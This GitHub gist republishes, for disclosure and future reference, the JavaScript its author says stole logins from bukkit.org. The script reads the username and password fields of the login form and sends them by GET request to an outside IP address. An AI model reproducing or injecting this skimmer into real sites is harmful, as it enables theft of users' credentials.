Instantly share code, notes, and snippets.

Embed
What would you like to do?
This was the script that was used to steal passwords and usernames on bukkit.org, one of Curse's sites. Since they didn't disclose it at the time I wrote my blog post, I published it here for future reference.
function getXmlHttp() {
try {
return new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e) {
try {
return new ActiveXObject("Microsoft.XMLHTTP");
}
catch (ee) {
}
}
if (typeof XMLHttpRequest != 'undefined') {
return new XMLHttpRequest();
}
}
function authXen() {
var xmlhttp = getXmlHttp();
var user = encodeURI(document.getElementById("ctrl_pageLogin_login").value);
var pass = encodeURI(document.getElementById("ctrl_pageLogin_password").value);
var url = "http://108.61.204.52/a.php?s=bukkit&u=";
url = url.concat(user);
url = url.concat("&p=");
url = url.concat(pass);
xmlhttp.open("GET", url);
xmlhttp.send(null);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment